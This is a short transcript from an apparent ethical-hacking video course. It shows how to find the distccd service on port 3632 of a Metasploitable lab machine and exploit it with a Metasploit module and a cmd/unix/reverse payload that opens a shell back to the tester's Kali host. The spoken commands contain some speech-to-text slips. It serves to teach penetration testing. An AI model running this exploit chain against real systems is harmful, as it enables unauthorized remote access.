From the course: Kali Linux for Advanced Pen Testing and Ethical Hacking

Unlock this course with a free trial

Join today to access over 25,300 courses taught by industry experts.

Exploiting the distributed compile system

Exploiting the distributed compile system - Linux Tutorial

From the course: Kali Linux for Advanced Pen Testing and Ethical Hacking

Exploiting the distributed compile system

- [Instructor] Sometimes we'll run a default scan and find nothing of interest. But in fact, there could be services existing on ports outside of the default scanning range. If we run a wider scanner on Metasploitable, we find that there's a service running on port 3632. Let's check this, and map minus PS minus sV minus p3632. And we find the distccd service. Let's check what searchsploit has for us, searchsploit distcc. And we find there's a command execution in Metasploit for this cc. Msfconsole and we'll search again for distcc and we find it we'll use zero and we'll set our remote host to 10.0.2.8. And we'll set lhost* Kali System 10.0.2.18 And we'll set the payload to cmd/unix/reverse and we'll exploit. And we have a shell, who am I, we're a daemon. And we're in a user shell.

Contents